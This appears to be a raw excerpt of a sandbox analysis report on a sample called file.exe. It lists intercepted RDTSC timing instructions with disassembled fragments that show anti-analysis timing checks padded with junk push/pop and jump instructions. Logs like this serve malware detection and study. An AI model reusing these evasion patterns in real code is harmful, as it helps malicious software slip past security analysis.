Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1876908 second address: 1876912 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC69D5338F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1876A37 second address: 1876A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1876D4B second address: 1876D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1876D51 second address: 1876D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC69CFD56E6h 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007FC69CFD56E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 187A509 second address: 187A50F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 187AA46 second address: 187AA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1883F3C second address: 1883F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1883F41 second address: 1883F4B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC69CFD56FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1883F4B second address: 1883F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69D533900h 0x00000009 pushad 0x0000000a jmp 00007FC69D533909h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1881FAB second address: 1881FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56F0h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18822EA second address: 18822EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18828E7 second address: 18828EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18836E7 second address: 18836EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18836EB second address: 18836EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18836EF second address: 1883708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC69D533901h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1883708 second address: 188372F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FC69CFD56E6h 0x00000014 jnp 00007FC69CFD56E6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 188372F second address: 1883733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1883733 second address: 1883739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1883739 second address: 188373F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 188373F second address: 1883744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 188561D second address: 1885621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1885621 second address: 1885645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC69CFD56F9h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 188D4B5 second address: 188D4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 188D7F0 second address: 188D80A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 188D980 second address: 188D9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69D533901h 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007FC69D5338FAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 188DDD3 second address: 188DDEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 188DDEA second address: 188DE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FC69D5338F6h 0x0000000d jmp 00007FC69D533900h 0x00000012 popad 0x00000013 pushad 0x00000014 jg 00007FC69D5338F6h 0x0000001a pushad 0x0000001b popad 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 188DE18 second address: 188DE22 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC69CFD56E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1893F24 second address: 1893F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69D533909h 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FC69D5338F6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1893F4B second address: 1893F4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1894361 second address: 1894366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1894366 second address: 189436B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18944A1 second address: 18944D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC69D5338FEh 0x0000000c push esi 0x0000000d jmp 00007FC69D533903h 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18944D0 second address: 18944D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18944D6 second address: 18944FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jns 00007FC69D5338F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1894927 second address: 189493E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 189493E second address: 1894947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1894947 second address: 189494D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1894AC1 second address: 1894AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FC69D533908h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1894AE4 second address: 1894AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FC69CFD56EEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1894E2B second address: 1894E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1894E2F second address: 1894E46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1894E46 second address: 1894E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1895D08 second address: 1895D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1893A43 second address: 1893A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1893A47 second address: 1893A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1893A4D second address: 1893A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FC69D533903h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0C79 second address: 17D0C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 189E5BE second address: 189E5C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 189E5C9 second address: 189E5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D5EAF second address: 17D5EB4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18A91E2 second address: 18A91FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC69CFD56F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18A91FD second address: 18A9228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FFh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FC69D5338F6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 js 00007FC69D533936h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18A9228 second address: 18A922C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18A922C second address: 18A9230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18A9230 second address: 18A9256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC69CFD56F1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18AD930 second address: 18AD970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69D533905h 0x00000008 jmp 00007FC69D533909h 0x0000000d jmp 00007FC69D5338FBh 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18AD31F second address: 18AD344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FC69CFD56E6h 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC69CFD56EDh 0x00000015 jg 00007FC69CFD56E8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18AD344 second address: 18AD36E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC69D533913h 0x00000008 jmp 00007FC69D533907h 0x0000000d jng 00007FC69D5338F6h 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18AD4A1 second address: 18AD4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC69CFD56E6h 0x0000000a jmp 00007FC69CFD56F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FC69CFD56E6h 0x00000017 jmp 00007FC69CFD56EBh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18AD4D4 second address: 18AD4D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B1839 second address: 18B1845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B1845 second address: 18B184B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B1976 second address: 18B1983 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007FC69CFD56E6h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B1983 second address: 18B198B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B7EB5 second address: 18B7EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B7EB9 second address: 18B7EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CA77B second address: 18CA77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CA77F second address: 18CA785 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C90D6 second address: 18C90F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007FC69CFD56E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007FC69CFD56E6h 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C969A second address: 18C96B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C997D second address: 18C9998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CFD56F4h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C9998 second address: 18C9A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69D5338FEh 0x00000008 jmp 00007FC69D5338FEh 0x0000000d jp 00007FC69D5338F6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC69D5338FDh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC69D533909h 0x00000026 jmp 00007FC69D533904h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C9A00 second address: 18C9A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CA44F second address: 18CA454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CA454 second address: 18CA46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CA46F second address: 18CA473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CA473 second address: 18CA490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC69CFD56F2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CA490 second address: 18CA4C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533902h 0x00000007 jmp 00007FC69D533908h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CEF3F second address: 18CEF62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69CFD56F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18CEF62 second address: 18CEF6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC69D5338F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 190A281 second address: 190A2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FC69CFD56F9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 190A2A3 second address: 190A2B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69D5338FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 191A999 second address: 191A99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 191A99D second address: 191A9A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 191EB4E second address: 191EB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2424 second address: 19E2439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC69D5338FAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2439 second address: 19E2452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC69CFD56E6h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 je 00007FC69CFD56EEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2614 second address: 19E262B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007FC69D5338FFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E262B second address: 19E2637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2637 second address: 19E2686 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC69D533907h 0x00000014 jmp 00007FC69D533908h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jnc 00007FC69D5338F6h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2818 second address: 19E2820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2820 second address: 19E2824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2824 second address: 19E283F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2AC9 second address: 19E2ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2ACF second address: 19E2AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FC69CFD56EEh 0x0000000d jo 00007FC69CFD56E6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2AEC second address: 19E2B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69D5338FDh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2B03 second address: 19E2B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E7569 second address: 19E756D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E756D second address: 19E75AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC69CFD56F0h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 jmp 00007FC69CFD56F3h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC69CFD56EBh 0x00000020 rdtsc
